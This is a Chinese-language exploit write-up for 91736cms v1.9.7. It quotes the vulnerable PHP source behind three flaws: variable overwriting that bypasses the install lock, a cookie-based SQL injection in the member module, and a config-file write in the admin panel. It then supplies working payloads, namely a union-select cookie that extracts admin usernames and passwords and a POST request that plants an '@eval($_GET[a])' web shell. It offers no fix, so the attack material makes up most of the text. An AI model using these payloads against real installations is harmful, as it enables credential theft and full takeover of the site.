91736cms变量覆盖重装漏洞&&前台sql注入、后台写配置文件getshel

91736cms_v1.9.7

1.问题文件91736cms/install/index.php第8行到27行:

$insLockfile = dirname(__FILE__).'/install_lock.txt';

define('CMS_ROOT',ereg_replace("[\\/]install",'',dirname(__FILE__)));

define('CMS_DATA',CMS_ROOT.'/data/');

header("Content-Type: text/html; charset={$lang}");

foreach(Array('_GET','_POST','_COOKIE') as $_request){

foreach($$_request as $_k => $_v) ${$_k} = _runmagicquotes($_v);

}

function _runmagicquotes(&$svar){

if(!get_magic_quotes_gpc()){

if( is_array($svar) ){

foreach($svar as $_k => $_v) $svar[$_k] = _runmagicquotes($_v);

}else{

$svar = addslashes($svar);

}

}

return $svar;

}

if(file_exists($insLockfile)){

exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");

}

1.1这里从GET、POST、COOKIE中取数组到变量赋值,存在变量覆盖漏洞,把$insLockfile赋值为不存在的文件名即可导致重装漏洞

2.问题文件91736cms/system/modules/member第203到212行:

private function member_info(){

if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])){

showmsg(C("admin_not_exist"),"index.php?m=member&f=login");

}

$user=$_COOKIE['member_user'];

$userid=$_COOKIE['member_userid'];

$info=$this->mysql->get_one("select * from ".DB_PRE."member where `userid`=$userid");

assign('member',$info);

}

2.1判断会员登录直接通过cookie获取,构造两个值就可以直接cookie注入

Exploit:

Cookie: member_user=testtest; member_userid=-1 union select 1,2,concat_ws(0x20,id,username,password),4,5,6,7,null,null,10,11,12,13,14 from c_admin

3.后台写入配置文件getshell

系统设置-网站配置-基本设置里面直接抓包,会在91736cms/system/91736.inc.php和91736cms/cache/cache_sys/cache_set_config.php里面分别写入配置文件,在第一个文件没有过滤参数,可以直接写入一句话getshell.

POC:

POST /index.php?m=91736&c=setting&f=save

sitename=91736&siteurl=http%3A%2F%2F127.0.0.1%2F&logourl=uploadfile%2Fimage%2F20111120%2F20111120085030.jpg&template=default12&caching=false);%0a%20@eval($_GET[a]&webstate1=%CD%F8%D5%BE%CE%AC%BB%A4%D6%D0…&copyright=%C4%CF%C4%FE%D0%F1%B6%AB%CD%F8%C2%E7%BF%C6%BC%BC%D3%D0%CF%DE%B9%AB%CB%BE+20112+%B0%E6%C8%A8%CB%F9%D3%D0+%B9%F0ICP%B1%B803023960%BA%C5+%B5%E7%BB%B0%A3%BA0086-888-88888888%3Cbr%3ECopyright+2012+XuDong+network+technology+Co.%2C+LT&createhtml=0&title=91736%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3&keywords=%C6%F3%D2%B5%CD%F8%D5%BE%CF%B5%CD%B3aaa&description=91736%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3%CA%C7%D3%C991736%CD%C5%B6%D3%B6%C0%C1%A2%BF%AA%B7%A2%B5%C4%C6%F3%D2%B5%CD%F8%D5%BE%B9%DC%C0%ED%CF%B5%CD%B3&tag=config&submit=+%B1%A3+%B4%E6+

执行phpinfo();

0 条评论
发表一条评论